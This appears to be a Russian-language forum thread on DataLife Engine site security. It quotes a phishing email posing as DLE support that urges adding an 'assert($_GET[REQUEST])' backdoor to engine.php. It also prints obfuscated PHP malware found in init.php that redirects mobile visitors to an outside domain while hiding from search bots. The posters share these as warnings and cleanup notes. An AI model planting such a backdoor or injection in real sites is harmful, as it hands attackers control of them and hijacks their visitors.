[Попытка взлома сайта через письмо от имени якобы службы поддержки DLE]

http://forum.dle-new...ndpost&p=332113

Прошу прощения, не увидел.

[Попытка взлома сайта через письмо от имени якобы службы поддержки DLE]

Сегодня на почту получил письмо слдующего содержания.

Данное письмо вам отправил support@dle-news.ru с сайта http://*****.ru/

-------------------------

-----------------------

Текст сообщения

------------------------------------------------

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте http://*****.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: http://*****.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,

Служба поддержки «DataLife Engine»

Чуть было не повелся и не пошел менять файл. Но что-то меня смутило и решил проверить информацию на сайте dle-news.ru, а затем и в Google. Взглянув на функцию assert() окончательно понял, что меня хотят целенаправленно взломать.

Спасибо за внимание. Всем бдительности!

[Новая система антиспама может лишить ваш сайт части допропорядочных пользователей]

Тоже была такая бяка, что я как пользователь интернета от Билайн не мог зарегистрироваться на своем сайте. Перезагрузил роутер для смены IP - не помогло. Сегодня обнаружил старую проблему. У меня некорректно передается IP на VPS, так как не настроен правильно модуль mod_rpaf Апача. Сервер все заходы засчитывал со своего IP. После внесения изменений в конфигурационный файл регистрация заработала, так как начал передаваться правильный IP.

Так что все кто хостится на VPS-ках проверяйте настройки своих серверов.

[Заражение сайта вирусом (опыт борьбы)]

На вашем сайте есть как миниум одна серьезная уязвимость, а именно уязвимости в серверном ПО phpMyAdmin, он у вас стоит без патчей безопасности в открытом виде по стандартному пути панели ISP. Это только то что я увидел сразу. Может быть и другие проблемы безопасности.

Все верно. Серверное ПО действительно давно не обновлялось. Теперь буду относиться к таким вещам более внимательно.

[Заражение сайта вирусом (опыт борьбы)]

Здравствуйте!

Позавчера в панели вебмастером от Яндекса увидел, что моему сайту на DLE присвоена поментка о наличии угрозы для компьютеров и мобильных устройств. Трафик с Яндекса упал практически в ноль. Первый беглый осмотр не выявил никаких аномалий. Написал в техподдержку Яндекса, что сайт чист.

Но потом стал думать, что как в известном мультике "это жжже неспроста...". Написал простенький просмотрщик кодов ответа сервера на PHP и под разными узерагентами проверил сайт. Оказалось, что Яндес был все-таки прав. С мобильных устройств и версии сайта для них идет переадресация на левый сайт.

Скрипт и отключение JavaScript в браузере показали, что к полной новости для мобильных устройств в самый верх страницы перед <html> добавляется вот такое:

<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?3&seo"+"ref="+encodeURIComponent(document.referrer)+ "&para"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script>

Задумано неплохо. На мобильную версию сайта многие заходят очень редко и заражение заметят очень не скоро. Начал искать вирус. Чтобы проще это было делать, сохранил все файлы сайта на локальный диск. Вирус нашелся в файле /engine/init.php. 1-я вставка

$shka=strrev('eld');

2-я вставка

$bot = 0; $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $bots = array('crawl', 'yande', 'googl', 'bot');

if( count($bots) ){foreach( $bots as $b ){if( strpos($userAgent, $ !== FALSE ){$bot = 1; break;}}};

if ( check_smartphone() ) {if (($_SERVER['REQUEST_URI'] != '/') and (!isset ($_COOKIE['dle_user_id'])) and (!$bot))

{echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//"."dle".$shka.".net"."/user/id?3&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"&para\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>";}

		if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) and ( $config['allow_smartphone'] )) {

			$config['skin'] = "smartphone";

			$smartphone_detected = true;

			$config['allow_comments_wysiwyg'] = "no";}}

if (!isset ( $do ) AND isset ($_REQUEST['do']) ) $do = totranslit ( $_REQUEST['do'] ); elseif(isset ( $do )) $do = totranslit ( $do ); else $do = "";

if (!isset ( $subaction ) AND isset ($_REQUEST['subaction']) ) $subaction = totranslit ($_REQUEST['subaction']); else $subaction = totranslit ($subaction);

if ( isset ($_REQUEST['doaction']) ) $doaction = totranslit ($_REQUEST['doaction']); else $doaction = "";

if ($do == "tags" AND !$_GET['tag']) $do = "alltags";

[/code]

Путь заражения файла остался невыяненным. Все патчи безопасности на моем DLE 9.7 были установлены.

Надеюсь, что мой опыт поможет тем, кто пострадал от подобного вируса быстрее с ним справиться.